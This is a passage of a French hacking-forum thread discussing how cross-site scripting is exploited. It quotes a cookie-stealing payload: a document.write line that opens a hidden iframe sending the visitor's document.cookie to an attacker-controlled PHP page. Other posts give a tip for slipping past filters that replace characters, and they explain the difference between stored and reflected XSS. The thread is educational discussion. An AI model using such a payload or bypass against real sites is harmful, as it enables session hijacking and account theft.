• STATISTIQUES
  • Il y a eu un total de 0 membres et 53536 visiteurs sur le site dans les dernières 24h pour un total de 53 536 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Asp-php
    Tutoriaux sur ASP, PHP, ASP.net, XML, SQL, Javascript, HTML, VML - Scripts et ressources pour webmasters - Forums d&#...
    Programmation
    [EN] HackQuest
    Logic: 12, JavaScript: 14, Applet: 6, CrackIt: 13, Crypto: 11, Internet: 3, Exploit: 7, Stegano: 12, Flash: 1, Programmi...
    Challenges
    [FR] Comment ca marche
     Gratuit et accessible à tous, ce site de communauté permet de se dépanner, se faire aider ...
    Webmaster
    [EN] SecurityFocus
    SecurityFocus a été conçu pour faciliter la discussion sur des sujets liés la sécu...
    Vulnérabilités
    [FR] Root-Me
    Notre équipe se base sur un constat : à l'heure actuelle ou l'information tend à devenir...
    Hacking
    [FR] WeChall
    Audio: 3, Coding: 11, Cracking: 9, Crypto: 18, Encoding: 11, Exploit: 44, Forensics: 1, Fun: 6, HTTP: 6, Image: 8, Java:...
    Challenges
    [EN] Net Force
    Javascript: 9, Java Applets: 6, Cryptography: 16, Exploits: 7, Cracking: 14, Programming: 13, Internet: 15, Steganograph...
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 5 (2 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Comment est exploitée une faille XSS
31-12-2012, 13h19
Message : #16
supersnail Hors ligne
Éleveur d'ornithorynques
*******



Messages : 1,609
Sujets : 71
Points: 465
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Citation :Dans le fichier cookie.js, nous allons ouvrire un IFRAME qui inclura en variable le cookie de la personne. Voici le codage.

Code :
document.write('<iframe src=http://tonsite.com/cookie.php?cookie='+document.cookie+' HEIGHT=0 WIDTH=0></iframe>');

Je pense que ça répond à la question :>
Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
+1 (0) -1 (0) Répondre
31-12-2012, 13h21
Message : #17
Wabouz Hors ligne
Membre actif
*



Messages : 96
Sujets : 8
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
Nan justement c'est de là que vient ma question, doit-on créer ce fichier? ou est-ce qu'on le trouve à un endroit?
C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
+1 (0) -1 (0) Répondre
31-12-2012, 13h23
Message : #18
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
RE: Comment exploiter une faille XSS
On doit le créer il sert a recuperer le cookie via la fonction JAVASCRIPT : document.cookie puis fait une redirection sur une page avec le cookie en parametre GET (cf: GET et POST en PHP) Wink
+1 (0) -1 (0) Répondre
31-12-2012, 13h26
Message : #19
Wabouz Hors ligne
Membre actif
*



Messages : 96
Sujets : 8
Points: 16
Inscription : Nov 2012
RE: Comment exploiter une faille XSS
D'accooooord, okay, merci beaucoup Smile
C'est l'histoire d'un mec qui rentre dans un canard... ( °3°)♫
+1 (0) -1 (0) Répondre
31-12-2012, 13h26
Message : #20
supersnail Hors ligne
Éleveur d'ornithorynques
*******



Messages : 1,609
Sujets : 71
Points: 465
Inscription : Jan 2012
RE: Comment exploiter une faille XSS
Ben le fichier cookie.js contient le code qui a été écrit (donc c'est à toi de le créer Wink ).

Enfin la faille elle permet à l'attaquant d'exécuter un javascript de son choix, qui peut être un "cookie stealer" (comme le montre CyberSee), mais sinon ça pourrait être un truc plus dangereux du genre une sorte de worm (comme a connu myspace y'a quelques années), ou pire, une sorte de page de "phishing" (principe en quelque sorte repris dans les "webinject" réalisés par les trojan de type banker, mais là je m'égare...).

Enfin bref, la XSS te permet d'exécuter n'importe quel bout de code JS de ton choix sur le site "victime" (bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )
Mon blog

Code :
push esp ; dec eax ; inc ebp ; and [edi+0x41],al ; dec ebp ; inc ebp

"VIM est merveilleux" © supersnail
+1 (0) -1 (0) Répondre
03-01-2013, 15h19
Message : #21
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,721
Sujets : 287
Points: 157
Inscription : Jan 2012
RE: Comment est exploiter une faille XSS
Citation :(bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )

lol effectivement!
Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>
+1 (0) -1 (0) Répondre
06-01-2013, 11h30
Message : #22
Ettorhake Hors ligne
Newbie
*



Messages : 11
Sujets : 1
Points: 1
Inscription : Dec 2012
RE: Comment est exploiter une faille XSS
Merci pour le tuto CyberSee !
+1 (0) -1 (0) Répondre
10-01-2013, 13h52
Message : #23
freekiss Hors ligne
Newbie
*



Messages : 9
Sujets : 1
Points: 0
Inscription : Dec 2012
RE: Comment est exploiter une faille XSS
Merci pour ce tuto plus complet que ceux que l'on vois généralement.
+1 (0) -1 (0) Répondre
11-01-2013, 01h05
Message : #24
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: Comment est exploiter une faille XSS
A par le Cour qui est très bien le titre,lui, n'est pas très bien exprimé si je peux me permettre .. :p
Un "Comment exploiter une faille XSS" aurait été mieux Smile
+1 (0) -1 (0) Répondre
11-01-2013, 14h15
Message : #25
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: Comment est exploiter une faille XSS
Sakiir, concernant le titre, c'était auparavant celui-là, mais il as était changer, car il mettez en doute l'orientation de la communauté.
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (0) -1 (0) Répondre
11-01-2013, 17h28
Message : #26
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,721
Sujets : 287
Points: 157
Inscription : Jan 2012
RE: Comment est exploiter une faille XSS
Effectivement, c'est ce que j'avais mis au départ ;-)
Code PHP :
<?php
$pape 
"pape"; echo $pape
// Le $pape en string!
?>
+1 (0) -1 (0) Répondre
11-01-2013, 17h50
Message : #27
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
RE: Comment est exploiter une faille XSS
Alors on pourrais le changer en "Comment est exploitée une faille XSS" d'ailleurs le titre sur le forum est different de celui qui s'affiche sur la page :

Comment est exploiter une faille XSS
RE: Comment exploiter une faille XSS
+1 (0) -1 (0) Répondre
11-01-2013, 20h25
Message : #28
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: Comment est exploiter une faille XSS
ah oui je comprend , enfin c'est exploité quand même :p
+1 (0) -1 (0) Répondre
03-06-2013, 16h32
Message : #29
0pc0deFR
Non-enregistré



 
RE: Comment est exploitée une faille XSS
Sorry pour le déterrage. Régulièrement, des sites utilisent des systèmes de remplacement de caractère pour empêcher l'XSS. Souvent <h1>XSS</h1> va ce transformer en quelque chose comme _h1_XSS_/h1_. Pour bypasser ce genre de système, vous pouvez encoder votre requête: escape html.

A noter que le javascript n'est pas le seul moyen d'exploiter une XSS. Tout langage exécuté coté client peut exploiter une XSS. La balise <h1>XSS</h1> exploit potentiellement une vulnérabilité XSS même si l'intérêt est limité. Les Iframes font des dégâts.

Aussi, il existe deux types d'XSS. Les XSS qu'on retrouve souvent dans les fonctions recherches sont les XSS non stockées, cela signifie que l'exploitation de l'XSS n'est pas systématique ainsi que les XSS stockées, elles seront exécutés à chaque chargement de la page. Elles sont souvent stockées en base de données.
positive (0) negative (0) Répondre
03-06-2013, 19h06
Message : #30
CronosDark Hors ligne
Newbie
*



Messages : 5
Sujets : 1
Points: 1
Inscription : Jun 2013
RE: Comment est exploitée une faille XSS
Merci pour les TRES bon tutoriel ! =)
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  Comment exploiter une faille SQL Injection CyberSee 33 3,458 22-09-2015, 21h53
Dernier message: CyberSee
  [Tuto]Faille CRLF OverDreams 15 1,241 18-06-2013, 12h33
Dernier message: Hypnoze57
  [Faille WEB] LFI Swissky 10 852 25-02-2013, 22h04
Dernier message: InstinctHack
  [Faille Web] Full Path Disclosure Swissky 4 565 07-12-2012, 08h52
Dernier message: Shirobi
  Comment utiliser Metasploit EpicOut 4 417 15-09-2012, 20h47
Dernier message: Swissky
  Comment fonctionne les attaques de type IP-Spoofing Apophis 4 602 18-02-2007, 12h38
Dernier message: shutdownfuri

Atteindre :


Utilisateur(s) parcourant ce sujet : 10 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut